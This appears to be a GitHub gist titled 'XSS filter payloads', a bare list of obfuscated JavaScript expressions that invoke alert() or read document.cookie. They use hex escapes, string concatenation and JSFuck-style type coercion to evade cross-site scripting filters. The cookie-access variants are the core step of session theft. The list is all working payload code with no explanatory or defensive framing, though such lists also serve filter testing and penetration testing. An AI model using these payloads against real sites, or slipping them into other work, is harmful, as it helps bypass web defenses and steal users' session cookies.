Created
January 3, 2014 01:22
-
-
Save mccabe615/8230805 to your computer and use it in GitHub Desktop.
XSS filter payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| window: | |
| window["alert"]("ISR") | |
| window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]() | |
| window["ale"+"\x72\x74"]() | |
| window["\x61\x6c\x65\x72\x74"]() | |
| window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]() | |
| window['ale'+'\x72\x74']() | |
| window['\x61\x6c\x65\x72\x74']() | |
| window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[])) | |
| window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] | |
| this alert: | |
| this["alert"]("ISR") | |
| this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]() | |
| this["ale"+"\x72\x74"]() | |
| this["\x61\x6c\x65\x72\x74"]() | |
| this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]() | |
| this['ale'+'\x72\x74']() | |
| this['\x61\x6c\x65\x72\x74']() | |
| this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[])) | |
| this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] | |
| this document: | |
| this["document"]["cookie"] | |
| this["document"]["\x63\x6f\x6f\x6b\x69\x65"] | |
| this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"] | |
| this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] | |
| this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"] | |
| this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"] | |
| this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"] | |
| this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"] | |
| this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"] | |
| this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"] | |
| this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"] | |
| this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"] | |
| this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"] | |
| this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"] | |
| this['document']['cookie'] | |
| this['document']['\x63\x6f\x6f\x6b\x69\x65'] | |
| this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie'] | |
| this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65'] | |
| this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie'] | |
| this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65'] | |
| this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65'] | |
| this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie'] | |
| this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65'] | |
| this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie'] | |
| this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65'] | |
| this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie'] | |
| this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65'] | |
| this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie'] | |
| document cookie: | |
| document["cookie"] | |
| document["\x63\x6f\x6f\x6b\x69\x65"] | |
| document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"] | |
| document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"] | |
| document['cookie'] | |
| document['\x63\x6f\x6f\x6b\x69\x65'] | |
| document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie'] | |
| document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65'] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment